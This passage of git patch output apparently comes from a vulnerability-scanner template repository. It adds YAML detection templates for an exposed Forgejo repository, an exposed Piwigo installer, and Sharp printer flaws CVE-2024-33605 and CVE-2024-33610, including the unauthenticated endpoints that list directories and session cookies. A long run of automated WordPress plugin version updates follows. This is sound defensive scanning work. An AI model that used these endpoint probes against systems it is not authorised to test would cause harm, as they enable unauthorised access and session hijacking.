42a6106c80..a19178494c 100644 --- a/http/misconfiguration/forgejo-repo.yaml +++ b/http/misconfiguration/forgejo-repo-exposure.yaml @@ -1,11 +1,11 @@ -id: forgejo-repo +id: forgejo-repo-exposure info: name: Forgejo Repositories - Exposure author: DhiyaneshDK severity: medium description: | - Forgejo repo is exposed + The Forgejo repo is being exposed publically. metadata: verified: true max-request: 1 @@ -27,11 +27,6 @@ http: - 'Repositories' condition: and - - type: word - part: header - words: - - "text/html" - - type: status status: - 200 From 4f6fc54b9b01976b914bc97a2ec822b4f12a18e5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 28 Jun 2024 14:17:13 +0530 Subject: [PATCH 0725/1841] Create piwigo-installer.yaml --- .../installer/piwigo-installer.yaml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 http/misconfiguration/installer/piwigo-installer.yaml diff --git a/http/misconfiguration/installer/piwigo-installer.yaml b/http/misconfiguration/installer/piwigo-installer.yaml new file mode 100644 index 0000000000..77b98fee35 --- /dev/null +++ b/http/misconfiguration/installer/piwigo-installer.yaml @@ -0,0 +1,34 @@ +id: piwigo-installer + +info: + name: Piwigo Installation Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Piwigo is susceptible to the Installation page exposure due to misconfiguration. + metadata: + verified: true + max-request: 1 + shodan-query: html:"Piwigo" html:"- Installation" + tags: misconfig,exposure,install,piwigo + +http: + - method: GET + path: + - "{{BaseURL}}/install.php" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - 'Piwigo ([0-9.]+) \- Installation' + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From 68760bee5789266d55a17de52d1801e5516bf95d Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sat, 29 Jun 2024 16:24:34 +0530 Subject: [PATCH 0726/1841] Update piwigo-installer.yaml --- http/misconfiguration/installer/piwigo-installer.yaml | 5 ----- 1 file changed, 5 deletions(-) diff --git a/http/misconfiguration/installer/piwigo-installer.yaml b/http/misconfiguration/installer/piwigo-installer.yaml index 77b98fee35..fea6c9aac8 100644 --- a/http/misconfiguration/installer/piwigo-installer.yaml +++ b/http/misconfiguration/installer/piwigo-installer.yaml @@ -24,11 +24,6 @@ http: regex: - 'Piwigo ([0-9.]+) \- Installation' - - type: word - part: header - words: - - "text/html" - - type: status status: - 200 From 88da24bf09a5531dc953227e6ed8646f915be068 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Sun, 30 Jun 2024 14:39:15 +0900 Subject: [PATCH 0727/1841] Create CVE-2024-33605.yaml It was observed that Sharp printers are vulnerable to an arbitrary directory listing without authentication. Any attacker can list any directory located in the printer and recover any file. Signed-off-by: GwanYeong Kim --- http/cves/2024/CVE-2024-33605.yaml | 46 ++++++++++++++++++++++++++++++ 1 file changed, 46 insertions(+) create mode 100644 http/cves/2024/CVE-2024-33605.yaml diff --git a/http/cves/2024/CVE-2024-33605.yaml b/http/cves/2024/CVE-2024-33605.yaml new file mode 100644 index 0000000000..0993a6271f --- /dev/null +++ b/http/cves/2024/CVE-2024-33605.yaml @@ -0,0 +1,46 @@ +id: CVE-2024-33605 + +info: + name: Sharp Multifunction Printers - Arbitrary Directory Listing without authentication + author: gy741 + severity: high + description: | + It was observed that Sharp printers are vulnerable to an arbitrary directory listing without authentication. Any attacker can list any directory located in the printer and recover any file. + remediation: Apply all relevant security patches and product upgrades. + reference: + - https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html#pre-auth-arbitrary-directory-listing + - https://jvn.jp/en/vu/JVNVU93051062/index.html + - https://global.sharp/products/copier/info/info_security_2024-05.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2024-33605 + cwe-id: CWE-22 + metadata: + verified: true + max-request: 1 + shodan-query: "Set-Cookie: MFPSESSIONID=" + tags: cve,cve2024,sharp,printer,traversal + +http: + - method: GET + path: + - "{{BaseURL}}/installed_emanual_list.html" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'ServiceEmanualList' + - '/installed_emanual_down.html' + condition: and + + - type: word + part: header + words: + - "Set-Cookie: MFPSESSIONID=" + + - type: status + status: + - 200 From 1aa27891dda9dfb6e1520735481c6e8788a32ad2 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Sun, 30 Jun 2024 15:57:08 +0900 Subject: [PATCH 0728/1841] Create CVE-2024-33610.yaml It was observed that Sharp printers are vulnerable to a listing of session cookies without authentication. Any attacker can list valid cookies by visiting a backdoor webpage and use them to authenticate to the printers. Signed-off-by: GwanYeong Kim --- http/cves/2024/CVE-2024-33610.yaml | 53 ++++++++++++++++++++++++++++++ 1 file changed, 53 insertions(+) create mode 100644 http/cves/2024/CVE-2024-33610.yaml diff --git a/http/cves/2024/CVE-2024-33610.yaml b/http/cves/2024/CVE-2024-33610.yaml new file mode 100644 index 0000000000..5e0f1fbb07 --- /dev/null +++ b/http/cves/2024/CVE-2024-33610.yaml @@ -0,0 +1,53 @@ +id: CVE-2024-33610 + +info: + name: Sharp Multifunction Printers - Cookie Exposure + author: gy741 + severity: medium + description: It was observed that Sharp printers are vulnerable to a listing of session cookies without authentication. Any attacker can list valid cookies by visiting a backdoor webpage and use them to authenticate to the printers. + impact: | + The exposure of cookies can lead to session hijacking, unauthorized access, and potential data breaches. + remediation: | + Apply all relevant security patches and product upgrades. + reference: + - https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html#pre-auth-cookies + - https://jvn.jp/en/vu/JVNVU93051062/index.html + - https://global.sharp/products/copier/info/info_security_2024-05.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 9.1 + cve-id: CVE-2024-33610 + cwe-id: CWE-284 + metadata: + verified: true + max-request: 1 + shodan-query: "Set-Cookie: MFPSESSIONID=" + tags: cve,cve2024,sharp,printer,exposure + +http: + - method: GET + path: + - "{{BaseURL}}/sessionlist.html" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'No.' + - 'User' + - 'From' + - 'Last login' + - 'Last access' + - 'Language ID' + - 'Cookie' + condition: and + + - type: word + part: header + words: + - "Set-Cookie: MFPSESSIONID=" + + - type: status + status: + - 200 From e7bdc5ca2922a735cd05e6b30a8c4f09f093ffae Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 1 Jul 2024 00:22:38 +0000 Subject: [PATCH 0729/1841] Auto WordPress Plugins Update [Mon Jul 1 00:22:38 UTC 2024] :robot: --- .../wordpress/plugins/breadcrumb-navxt.txt | 2 +- helpers/wordpress/plugins/loginizer.txt | 2 +- .../wordpress/plugins/siteorigin-panels.txt | 2 +- .../wordpress/plugins/so-widgets-bundle.txt | 2 +- helpers/wordpress/plugins/wp-optimize.txt | 2 +- helpers/wordpress/plugins/wp-seopress.txt | 2 +- .../wordpress/plugins/ad-inserter.yaml | 1 - .../wordpress/plugins/add-to-any.yaml | 1 - .../wordpress/plugins/admin-menu-editor.yaml | 1 - .../plugins/advanced-custom-fields.yaml | 1 - .../wordpress/plugins/akismet.yaml | 1 - .../plugins/all-in-one-seo-pack.yaml | 1 - .../plugins/all-in-one-wp-migration.yaml | 1 - .../all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - .../wordpress/plugins/antispam-bee.yaml | 1 - .../wordpress/plugins/astra-sites.yaml | 1 - .../wordpress/plugins/autoptimize.yaml | 1 - .../wordpress/plugins/backwpup.yaml | 1 - .../plugins/better-search-replace.yaml | 1 - .../wordpress/plugins/better-wp-security.yaml | 1 - .../plugins/black-studio-tinymce-widget.yaml | 1 - .../wordpress/plugins/breadcrumb-navxt.yaml | 1 - .../wordpress/plugins/breeze.yaml | 1 - .../plugins/broken-link-checker.yaml | 1 - .../technologies/wordpress/plugins/chaty.yaml | 48 +++++++++++++++++++ .../plugins/child-theme-configurator.yaml | 1 - .../wordpress/plugins/classic-editor.yaml | 1 - .../wordpress/plugins/classic-widgets.yaml | 1 - .../plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - .../wordpress/plugins/coblocks.yaml | 1 - .../wordpress/plugins/code-snippets.yaml | 1 - .../wordpress/plugins/coming-soon.yaml | 1 - .../wordpress/plugins/complianz-gdpr.yaml | 1 - .../plugins/contact-form-7-honeypot.yaml | 1 - .../wordpress/plugins/contact-form-7.yaml | 1 - .../wordpress/plugins/contact-form-cfdb7.yaml | 1 - .../wordpress/plugins/cookie-law-info.yaml | 1 - .../wordpress/plugins/cookie-notice.yaml | 1 - .../wordpress/plugins/copy-delete-posts.yaml | 1 - .../wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../creative-mail-by-constant-contact.yaml | 1 - .../wordpress/plugins/custom-css-js.yaml | 1 - .../wordpress/plugins/custom-fonts.yaml | 1 - .../plugins/custom-post-type-ui.yaml | 1 - .../wordpress/plugins/disable-comments.yaml | 1 - .../wordpress/plugins/disable-gutenberg.yaml | 1 - .../wordpress/plugins/duplicate-page.yaml | 1 - .../wordpress/plugins/duplicate-post.yaml | 1 - .../wordpress/plugins/duplicator.yaml | 1 - .../duracelltomi-google-tag-manager.yaml | 1 - .../plugins/easy-table-of-contents.yaml | 1 - .../wordpress/plugins/easy-wp-smtp.yaml | 1 - .../wordpress/plugins/elementor.yaml | 1 - .../wordpress/plugins/elementskit-lite.yaml | 1 - .../plugins/enable-media-replace.yaml | 1 - .../wordpress/plugins/envato-elements.yaml | 1 - .../essential-addons-for-elementor-lite.yaml | 1 - .../plugins/ewww-image-optimizer.yaml | 1 - .../plugins/facebook-for-woocommerce.yaml | 1 - .../wordpress/plugins/fast-indexing-api.yaml | 1 - .../favicon-by-realfavicongenerator.yaml | 1 - .../wordpress/plugins/flamingo.yaml | 1 - .../wordpress/plugins/fluentform.yaml | 1 - .../wordpress/plugins/font-awesome.yaml | 1 - .../plugins/force-regenerate-thumbnails.yaml | 1 - .../wordpress/plugins/formidable.yaml | 1 - .../wordpress/plugins/forminator.yaml | 1 - .../plugins/ga-google-analytics.yaml | 1 - .../plugins/gdpr-cookie-compliance.yaml | 1 - .../google-analytics-dashboard-for-wp.yaml | 1 - .../google-analytics-for-wordpress.yaml | 1 - .../plugins/google-listings-and-ads.yaml | 1 - .../wordpress/plugins/google-site-kit.yaml | 1 - .../plugins/google-sitemap-generator.yaml | 1 - .../wordpress/plugins/gtranslate.yaml | 1 - .../wordpress/plugins/gutenberg.yaml | 1 - .../plugins/happy-elementor-addons.yaml | 1 - .../plugins/header-footer-code-manager.yaml | 1 - .../plugins/header-footer-elementor.yaml | 1 - .../wordpress/plugins/header-footer.yaml | 1 - .../wordpress/plugins/health-check.yaml | 1 - .../wordpress/plugins/hello-dolly.yaml | 1 - .../plugins/host-webfonts-local.yaml | 1 - .../wordpress/plugins/hostinger.yaml | 1 - .../wordpress/plugins/image-optimization.yaml | 1 - .../wordpress/plugins/imagify.yaml | 1 - .../wordpress/plugins/imsanity.yaml | 1 - .../plugins/insert-headers-and-footers.yaml | 1 - .../wordpress/plugins/instagram-feed.yaml | 1 - .../plugins/intuitive-custom-post-order.yaml | 1 - .../wordpress/plugins/jetpack-boost.yaml | 1 - .../wordpress/plugins/jetpack.yaml | 1 - .../wordpress/plugins/kadence-blocks.yaml | 1 - .../technologies/wordpress/plugins/kirki.yaml | 1 - .../wordpress/plugins/leadin.yaml | 1 - .../limit-login-attempts-reloaded.yaml | 1 - .../plugins/limit-login-attempts.yaml | 1 - .../wordpress/plugins/litespeed-cache.yaml | 1 - .../wordpress/plugins/loco-translate.yaml | 1 - .../wordpress/plugins/loginizer.yaml | 1 - .../plugins/mailchimp-for-woocommerce.yaml | 1 - .../wordpress/plugins/mailchimp-for-wp.yaml | 1 - .../wordpress/plugins/mailpoet.yaml | 1 - .../wordpress/plugins/maintenance.yaml | 1 - .../wordpress/plugins/mainwp-child.yaml | 1 - .../wordpress/plugins/malcare-security.yaml | 1 - .../wordpress/plugins/megamenu.yaml | 1 - .../wordpress/plugins/members.yaml | 1 - .../wordpress/plugins/meta-box.yaml | 1 - .../wordpress/plugins/metform.yaml | 1 - .../wordpress/plugins/ml-slider.yaml | 1 - .../wordpress/plugins/newsletter.yaml | 1 - .../plugins/nextend-facebook-connect.yaml | 1 - .../wordpress/plugins/nextgen-gallery.yaml | 1 - .../wordpress/plugins/ninja-forms.yaml | 1 - .../wordpress/plugins/ocean-extra.yaml | 1 - .../plugins/official-facebook-pixel.yaml | 1 - .../plugins/one-click-demo-import.yaml | 1 - .../wordpress/plugins/optinmonster.yaml | 1 - .../wordpress/plugins/otter-blocks.yaml | 1 - .../wordpress/plugins/password-protected.yaml | 1 - .../wordpress/plugins/pdf-embedder.yaml | 1 - .../plugins/pinterest-for-woocommerce.yaml | 1 - .../wordpress/plugins/pixelyoursite.yaml | 1 - .../wordpress/plugins/polylang.yaml | 1 - .../wordpress/plugins/popup-maker.yaml | 1 - .../wordpress/plugins/post-smtp.yaml | 1 - .../wordpress/plugins/post-types-order.yaml | 1 - .../plugins/premium-addons-for-elementor.yaml | 1 - .../wordpress/plugins/pretty-link.yaml | 1 - .../plugins/really-simple-captcha.yaml | 1 - .../wordpress/plugins/really-simple-ssl.yaml | 1 - .../wordpress/plugins/redirection.yaml | 1 - .../wordpress/plugins/redux-framework.yaml | 1 - .../plugins/regenerate-thumbnails.yaml | 1 - .../plugins/royal-elementor-addons.yaml | 1 - .../wordpress/plugins/safe-svg.yaml | 1 - .../wordpress/plugins/seo-by-rank-math.yaml | 1 - .../wordpress/plugins/sg-cachepress.yaml | 1 - .../wordpress/plugins/sg-security.yaml | 1 - .../plugins/shortcodes-ultimate.yaml | 1 - .../plugins/shortpixel-image-optimiser.yaml | 1 - .../plugins/simple-custom-post-order.yaml | 1 - .../wordpress/plugins/simple-history.yaml | 1 - .../wordpress/plugins/siteguard.yaml | 1 - .../wordpress/plugins/siteorigin-panels.yaml | 1 - .../wordpress/plugins/smart-slider-3.yaml | 1 - .../wordpress/plugins/so-widgets-bundle.yaml | 1 - .../sticky-header-effects-for-elementor.yaml | 1 - .../stops-core-theme-and-plugin-updates.yaml | 1 - .../wordpress/plugins/sucuri-scanner.yaml | 1 - .../wordpress/plugins/svg-support.yaml | 1 - .../plugins/table-of-contents-plus.yaml | 1 - .../wordpress/plugins/tablepress.yaml | 1 - .../plugins/taxonomy-terms-order.yaml | 1 - .../wordpress/plugins/templately.yaml | 1 - .../plugins/the-events-calendar.yaml | 1 - .../wordpress/plugins/tinymce-advanced.yaml | 1 - .../plugins/translatepress-multilingual.yaml | 1 - .../ultimate-addons-for-gutenberg.yaml | 1 - .../plugins/under-construction-page.yaml | 1 - .../wordpress/plugins/updraftplus.yaml | 1 - .../wordpress/plugins/user-role-editor.yaml | 1 - .../wordpress/plugins/w3-total-cache.yaml | 1 - .../plugins/webp-converter-for-media.yaml | 1 - .../wordpress/plugins/webp-express.yaml | 1 - .../plugins/widget-importer-exporter.yaml | 1 - .../woo-cart-abandonment-recovery.yaml | 1 - .../woo-checkout-field-editor-pro.yaml | 1 - .../plugins/woo-variation-swatches.yaml | 1 - .../plugins/woocommerce-gateway-stripe.yaml | 1 - .../plugins/woocommerce-legacy-rest-api.yaml | 1 - .../plugins/woocommerce-payments.yaml | 1 - .../plugins/woocommerce-paypal-payments.yaml | 1 - ...oocommerce-pdf-invoices-packing-slips.yaml | 1 - .../plugins/woocommerce-services.yaml | 1 - .../wordpress/plugins/woocommerce.yaml | 1 - .../wordpress/plugins/wordfence.yaml | 1 - .../wordpress/plugins/wordpress-importer.yaml | 1 - .../wordpress/plugins/wordpress-seo.yaml | 1 - .../wordpress/plugins/worker.yaml | 1 - .../wordpress/plugins/wp-fastest-cache.yaml | 1 - .../wordpress/plugins/wp-file-manager.yaml | 1 - .../wordpress/plugins/wp-google-maps.yaml | 1 - .../wordpress/plugins/wp-mail-smtp.yaml | 1 - .../plugins/wp-maintenance-mode.yaml | 1 - .../wordpress/plugins/wp-migrate-db.yaml | 1 - .../wordpress/plugins/wp-multibyte-patch.yaml | 1 - .../wordpress/plugins/wp-optimize.yaml | 1 - .../wordpress/plugins/wp-pagenavi.yaml | 1 - .../wordpress/plugins/wp-reset.yaml | 1 - .../plugins/wp-reviews-plugin-for-google.yaml | 1 - .../wordpress/plugins/wp-rollback.yaml | 1 - .../wordpress/plugins/wp-seopress.yaml | 1 - .../wordpress/plugins/wp-sitemap-page.yaml | 1 - .../wordpress/plugins/wp-smushit.yaml | 1 - .../wordpress/plugins/wp-statistics.yaml | 1 - .../wordpress/plugins/wp-super-cache.yaml | 1 - .../wordpress/plugins/wpcf7-recaptcha.yaml | 1 - .../wordpress/plugins/wpcf7-redirect.yaml | 1 - .../wordpress/plugins/wpforms-lite.yaml | 1 - .../wordpress/plugins/wps-hide-login.yaml | 1 - .../plugins/wpvivid-backuprestore.yaml | 1 - .../plugins/yith-woocommerce-wishlist.yaml | 1 - 206 files changed, 54 insertions(+), 205 deletions(-) create mode 100644 http/technologies/wordpress/plugins/chaty.yaml diff --git a/helpers/wordpress/plugins/breadcrumb-navxt.txt b/helpers/wordpress/plugins/breadcrumb-navxt.txt index 8b23b8d47c..34a8f745d4 100644 --- a/helpers/wordpress/plugins/breadcrumb-navxt.txt +++ b/helpers/wordpress/plugins/breadcrumb-navxt.txt @@ -1 +1 @@ -7.3.0 \ No newline at end of file +7.3.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/loginizer.txt b/helpers/wordpress/plugins/loginizer.txt index d2c4b27150..8b315b3fed 100644 --- a/helpers/wordpress/plugins/loginizer.txt +++ b/helpers/wordpress/plugins/loginizer.txt @@ -1 +1 @@ -1.8.7 \ No newline at end of file +1.8.8 \ No newline at end of file diff --git a/helpers/wordpress/plugins/siteorigin-panels.txt b/helpers/wordpress/plugins/siteorigin-panels.txt index 0181abe863..b765ebba38 100644 --- a/helpers/wordpress/plugins/siteorigin-panels.txt +++ b/helpers/wordpress/plugins/siteorigin-panels.txt @@ -1 +1 @@ -2.29.17 \ No newline at end of file +2.29.18 \ No newline at end of file diff --git a/helpers/wordpress/plugins/so-widgets-bundle.txt b/helpers/wordpress/plugins/so-widgets-bundle.txt index 3ec5a46689..244eebc121 100644 --- a/helpers/wordpress/plugins/so-widgets-bundle.txt +++ b/helpers/wordpress/plugins/so-widgets-bundle.txt @@ -1 +1 @@ -1.62.1 \ No newline at end of file +1.62.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-optimize.txt b/helpers/wordpress/plugins/wp-optimize.txt index fbcbf73806..8cf6caf561 100644 --- a/helpers/wordpress/plugins/wp-optimize.txt +++ b/helpers/wordpress/plugins/wp-optimize.txt @@ -1 +1 @@ -3.4.0 \ No newline at end of file +3.4.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-seopress.txt b/helpers/wordpress/plugins/wp-seopress.txt index ac2f3747d9..e048e60ec1 100644 --- a/helpers/wordpress/plugins/wp-seopress.txt +++ b/helpers/wordpress/plugins/wp-seopress.txt @@ -1 +1 @@ -7.9.1 \ No newline at end of file +7.9.2 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 2eb1e1138e..3fd2256749 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200f97c9f6cf51bc9e7136155d1ebd47c4965cd9479e9af2808895f06718a839eb02210089552a6a15cfd411655af54f1cd95d9309942d13f7ce470422f500de770c507b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 22f9c19cfc..6a0d344b63 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202b0dea2a98ca2ffcd00ea8f65b9c87360f28242dd23dfb5996cfd466cce5cec2022100d6d29c1120687dc26a5169c8c979880a9c558a858d08ca0c05729f37b4084306:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 3be0a9443c..6fb5080bc8 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100dec8b27ec9c8c349bee77b231bbd05dbbd56f1b9f1888cffcbb642a851d7b787022100bffb3b907c8eaa027a8c782ef4716d0dc028fc3f8eb3562c38fdc4166149fe86:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 135ebad99c..cddbb4bb2e 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e812876c0c926937ab99728aa69c91592d0297606e423a58dcc516b6184fe91502205c17f816e9f834b8bb50f5df5bf3d4dca879b8749db560dcc70c89909a92f4b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index cdea46a635..6f253f9f55 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022050c3c662668cd27c75004f1483145ff944dd4e76fdd654ce398de7b8717766b9022100d1706f67e5dcbda31fa2409fb77acb245ade2fe6e30790ab4e6cdd25772f3e71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 5daa824fc5..fe45de4d04 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022038eb0e210ce108cd7a9c936b4e5a2312946ab1a48b9f62ad39cb4b89393b9a08022100c12a3e6c5dce5779c669fcd2adb3422b7f8e4a2e0841212b5de1d0c2e802ba15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index c3ab62eeeb..69e425f446 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c6404220df1d8371d8d5ef524ec4ea0a952295b90731ef349ec6121497ed98310220469201578d660f92f1b6105ca0255a7b3b5344b4ace7f49bfbb4ac0d0005f47f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index b97e21f6e4..9c07c65e4e 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022017f4c1a49c49999e1961701d683353e6067013193e7e99aef20ca32b2c69b50d0220494c76083779882786dedc7cb44f525003684fb5abf51f8cd231420cc6787ec2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 593fce9dd7..92c8f5656e 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100819ca20c4a2a165b38eceef856975fe563ed0bc24e1ca8689985e3664dc9a3880220553f6c13a6f06d91c0857b198e30b526a8400d676c24bf2df7ad1486a4909926:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 7367e8ace6..70975a19a1 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205dcb80be4535b522828d22f4f705f941b909bf8184541bc390524ca2a12d731e022062790b398253283a1c2b9ec09386a9f9dce60ac2e15ec5b858aa54ba36b09719:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index cfe1145bf8..fd7e3e99dd 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022067d53904a19619a1696cdef2fe66798d29691de8794ff19881e006a49c696fcb022100d84bcf0356ee21ab40af757c6b3d179fdb1ee94c374ebd504f507ec71121fa76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 3ae5c4caf3..18f2a2ae84 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200d3dd7b32f21547074baf6756e7899bad2830b1036eec55b94f0963c6491f33502206323cd785021d58bca2ee64f548e5a3e75caf1dd1d52fc66d7775603e8792d36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 3c89b5c4a9..11cb41fb2c 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022016634830079b47a41c3a80e549a8916d7824eb5a60b1ea2e3275accc10889288022100b8e15fc0e6b8e728ba82a2fd5932e9412ecc130946902c3b08e6366c30999bcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index f0068dad3b..df3c5f3a94 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022069ed23484c27c6452e8f02b35b3e91201c94d3f1e0b938a7ea29d1c42869599c022100bc0557454d66d151101fdd75ac27dafbdef2f808e57f887edc711341f14032a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index a0b4b3d88f..6a50e049dc 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100dde3df3436f6a643e2131a0f20de65a6cebc5eac3a306c7677c5c5dd855e4806022100f36a886c8f91b9bb592cab143a3c5d7a42ab00524043730ed95b90dba6ad657d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index b3ea909edc..e532694167 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022006847af405b3fa72a1fcab9457c191da36a2c449fb0a805092b1fb563e458d1f0220747f3aa90ce78172cb77a5131fdb554a6f6d2867ba7591f0717cfaf731e13aad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 4bb07a6a8f..4c6e616c1d 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ 